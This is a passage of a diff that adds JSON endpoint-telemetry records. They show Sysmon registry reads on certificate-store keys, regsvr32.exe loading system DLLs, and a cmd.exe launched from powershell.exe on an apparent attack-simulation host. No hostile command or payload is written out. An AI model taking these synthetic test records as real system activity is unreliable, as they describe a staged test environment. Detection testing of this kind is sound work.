"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": 
"C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": 
"iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": 
"\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3696, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573236439984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": 